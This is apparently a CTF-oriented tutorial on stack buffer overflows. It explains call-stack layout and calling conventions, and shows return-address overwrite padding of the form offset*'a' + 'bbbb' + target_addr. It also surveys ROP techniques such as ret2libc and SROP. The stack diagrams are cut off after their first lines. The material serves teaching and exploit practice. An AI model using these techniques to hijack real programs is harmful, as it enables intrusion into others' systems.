Concise Challenge-Oriented stack overflow introduction.
Stack Introduction
It is a LIFO (Last in First Out) data structure, and basic operations include pop and push.
There are more kinds of complex stack in data structure, the operations are more than just pop and push. But neither of them is the stack of operating system, OS uses the basic one. BTW stack grows from high address to low address.
Besides stack, OS has register to store things
The stack serves for storing variables and function frames, can be called call stack as well. When storing function frames, program has to consider storing function parameters, variables and their order; old ebp/rbp for recovering previous frame; return addr to return after exiting current function.
The classic layout for function call stack is:
The layout when it needs to store some register on stack is:
A stack frame can be like:
Should caller function store the parameters/arguments, or should callee do?
Store them from left to right, or from right to left?
They are specified in the calling convention:
| Call method | Arg stack order | Arg location | Func to clean stack | Variable arg support | Func name format | Start of arg list |
|---|---|---|---|---|---|---|
| stdcall (Win32) | right to left | stack | callee | no | _name@number | “@@YG” |
| cdecl | right to left | stack | caller | yes | _name | “@@YA” |
| fastcall | right to left, arg1 in ecx, arg2 in edx | stack, registers | callee | no | @name@number | “@@YI” |
| thiscall (C++) | right to left, pointer ‘this’ in ecx | stack, registers, ecx | callee | no | ||
| naked call | customize | customize | customize | customize | customize | customize |
Note: what we are talking above are in 32-bit, in 64-bit the first 6 arguments of called function are saved in rdi, rsi, rdx, rcx, r8 and r9 in order.
Stack Overflow
Stack buffer overflow happens when program writes bytes to stack beyond variable’s original size.
In 32-bit if we have a variable s to overflow
1 | High addr +-----------------+ |
We write offset*'a' + 'bbbb' + target_addr, it will be like
1 | High addr +-----------------+ |
So when this function return it will return to execute codes at target_addr.
vulnerable function includes:
- Input
gets, read a line, neglect\x00scanfvscanf
- Output
sprintf
- String
strcpy, string copy, stop when meet\x00strcat, string concatenate, stop when meet\x00bcopy
Determine padding length:
- Index related to
ebp, check directly - Index related to
esp, needs debugging - Direct address index, which gives the address
To overflow we have some choices:
- overflow return address
- overflow some variable on
stack - overflow some variable on
bss - overflow some special address
ROP
ROP(Return Oriented Programming) is based on stack overflow, try to use useful code gadgets in the program to control execution flow.
Gadgets looks like: pop rdi ; ret, add ecx, ecx ; ret and mov ebx, dword ptr [esp] ; ret.
They should end with a ret so that every gadget can execute one by one.
There are also many types of it:
- Basic part
ret2text: return to codes in.textret2shellcode: return to execute your input shellcoderet2syscall: return to executesystem calllikeexecveret2libc: return to execute func inlibc(need to leak base addr)
- Intermediate
- Advanced
ret2_dl_runtime_resolve: exploit_dl_runtime_resolve(link_map_obj, reloc_index)(dynamic link)SROP: Sigreturn Oriented Programming, paper and slide,
signatureis asyscallcalled insignalmechanism of UNIX-like systemret2VDSO: Virtual Dynamically-linked Shared Object,
some kernel state call are mapped to user state to run faster,
intel cpu:sysenter,sysexit
amd cpu:syscall,sysret
Related challenge collections of mine (ADWorld series):
ADWorld PWN Exercise Area Write-ups (ROP Part)
ADWorld PWN Challenge Area Write-ups (ret2text Part)
ADWorld PWN Challenge Area Write-ups (ret2libc Part)
ADWorld PWN Challenge Area Write-ups (Advanced ROP)
There are also JOP(Jump-oriented programming) and COP(Call-oriented programming), which have similar feature to control program flow.